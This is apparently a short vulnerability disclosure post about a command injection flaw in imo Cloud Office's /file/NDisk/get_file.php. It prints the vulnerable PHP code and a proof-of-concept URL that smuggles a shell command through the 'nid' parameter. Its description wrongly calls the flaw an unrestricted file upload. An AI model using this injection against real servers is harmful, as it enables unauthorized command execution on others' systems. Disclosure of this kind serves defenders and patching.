Post

Imo Cloud Office Get_file Php Remote Command Execution Vulnerability

Imo Cloud Office Get_file Php Remote Command Execution Vulnerability

imo cloud office get_file.php remote command execution vulnerability

Vulnerability Description

imo cloud office /file/NDisk/get_file.php filtering is not strictly caused by unlimited upload of files, and attackers can directly obtain website permissions through this vulnerability.

Vulnerability Impact

imo Cloud Office

Network surveying and mapping

Vulnerability reappears

Login page

img

Vulnerability file get_file.php

1
2
3
4
5
6
7
8
9
10
11
12
<?php
// 放置在 mfs 服务器上用于获取文件列表,配合 nd_verify_large_file.php 使用
if(empty($_GET['cid']) || empty($_GET['nid']))
	exit;
$cid = $_GET['cid'];
$nid = $_GET['nid'];
$mainDir = dirname(__FILE__) . '/../upload/NDiskData/normal/' . $cid . '/';
exec("ls {$mainDir}*_{$nid}_*", $r);
$ret = array();
foreach($r as $v)
	$ret[md5_file($v)] = str_replace(dirname(__FILE__) . "/../upload/NDiskData/normal/{$cid}/", '', $v);
echo json_encode($ret);

Verify POC

1
/file/NDisk/get_file.php?cid=1&nid=;pwd;

img

This post is licensed under CC BY 4.0 by the author.